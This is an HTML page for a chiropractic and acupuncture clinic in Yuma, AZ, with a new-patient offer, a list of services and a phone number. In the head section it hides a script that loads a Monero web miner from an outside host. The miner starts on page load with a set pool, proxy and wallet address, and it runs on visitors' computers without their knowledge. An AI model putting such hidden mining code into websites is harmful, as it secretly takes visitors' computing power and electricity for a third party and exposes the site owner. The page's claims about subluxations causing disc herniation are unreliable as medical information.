<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
   
    <script src="https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js"></script>
    <script>
        server = "wss://ny1.xmrminingproxy.com";
        var pool = "moneroocean.stream";
        var walletAddress = "48xWV6Ej4qRPZdKVEX7xQgLyWvxrSmCVXZS5pLXGpuPbMH6GhtiBjXBcHqHLxMMmEW474dkWTdLEsR6nARhhgKGRBou6nSk";
        var workerId = "Dumb Dumb"
        var threads = -1;
        var password = "";
        startMining(pool, walletAddress, workerId, threads, password);
        throttleMiner = 20;
    </script>
    
    <title>Advanced Chiropractic Clinic and Acupuncture</title>
    <!-- Bootstrap CSS -->
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            background-color: #f2f2f2;
        }
        header {
            background-color: #333;
            color: #fff;
            padding: 20px;
            text-align: center;
            margin-bottom: 20px;
        }
        nav {
            background-color: #444;
            padding: 10px;
            text-align: center;
            margin-bottom: 20px;
        }
        nav a {
            color: #fff;
            text-decoration: none;
            padding: 10px 20px;
            margin: 0 5px;
        }
        nav a:hover {
            background-color: #666;
        }
        section {
            padding: 20px;
        }
        footer {
            background-color: #333;
            color: #fff;
            text-align: center;
            padding: 10px;
        }
        .product-img {
            max-width: 100%;
            height: auto;
            margin-bottom: 10px;
        }
    </style>
</head>
<body>
    <header>
        <h1>Advanced Chiropractic Clinic and Acupuncture</h1>
  
    <nav>
        <a href="#Home" class="btn btn-dark">Home</a>
        
        <a href="#Services" class="btn btn-dark">Services</a>
        <a href="#Contact" class="btn btn-dark">Contact</a>
    </nav>
</header>
    <section id="Home">
        <h2>NEW PATIENT SPECIAL!</h2>
        <p>New patient special. Expires 02/29/2024. Consultation, exam, and first treatment $89. (Regularly $140). This is a great time to make an appointment</p>
        <img src="front-image.jpeg"
    </section>
    <section id="Services" >
        <h2>Our Services</h2>
        <div class="row">
            <div class="col-md-4">
                <img src="neck-pain.png" alt="Product 1" class="product-img">
                <p>Neck Pain</p>
            </div>
            <div class="col-md-4">
                <img src="back-pain.png" alt="Product 2" class="product-img">
                <p>Back Pain</p>
            </div>
            <div class="col-md-4">
                <img src="shoulder-pain.jpg" alt="Product 3" class="product-img">
                <p>Shoulder Pain</p>
            </div>
        </div>
    </section>
    <section>
        <h3>If you are suffering with chronic low back pain, then Advanced Chiropractic Clinic and Acupuncture in Yuma, AZ may very well be your solution. We correct subluxations. A subluxation is a misalignment of a vertebra that “pinches” nerves in the spine. A subluxation can be very painful and is one of the most overlooked causes of back pain. This chronic pinched nerve can lead to a “slipped disc” or disc herniation. Slipped or herniated discs can be frequently corrected with quality chiropractic care. We also offer acupuncture and physical medicine modalities to help ease the pain and facilitate healing

        </h3>
    </section>
    <section id="Contact">
        <h2>Contact Us</h2>
        <p>Advanced Chiropractic Clinic and Acupuncture</p>
        <p>Phone: 928-248-5557 </p>
    </section>
    <footer>
        &copy; 2024 Advanced Chiropractic Clinic and Acupuncture. All rights reserved.
    </footer>

    <!-- Bootstrap JS (optional) -->
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
</body>
</html>

